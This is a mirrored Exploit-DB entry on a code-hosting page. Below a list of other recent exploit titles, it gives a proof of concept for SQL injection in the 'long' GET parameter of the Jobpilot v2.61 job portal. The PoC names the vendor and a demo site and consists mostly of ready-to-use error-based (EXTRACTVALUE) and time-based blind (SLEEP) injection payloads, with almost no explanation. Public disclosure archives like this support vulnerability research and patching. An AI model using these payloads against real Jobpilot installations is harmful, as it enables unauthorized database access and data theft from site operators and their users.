bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51527.txt
Exploit-DB 147824bdba DB: 2023-06-20 
8 changes to exploits/shellcodes/ghdb

Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)

BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)

Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

Groomify v1.0 - SQL Injection

Jobpilot v2.61 - SQL Injection

Sales Tracker Management System v1.0 - Multiple Vulnerabilities

Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)

The Shop v2.5 - SQL Injection

WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass
2023-06-20 00:16:29 +00:00

28 lines
No EOL
1.1 KiB
Text
Raw Blame History

# Exploit Title: Jobpilot v2.61 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
# Demo Site: https://jobpilot.templatecookie.com
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Parameter: long (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT
(ELT(4894=4894,1))),0x71786b7171)) AND
(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
Fire Contract Counties, California, United
States&category=&price_min=&price_max=&tag=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND
(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
Fire Contract Counties, California, United
States&category=&price_min=&price_max=&tag=
Reference in a new issue View git blame Copy permalink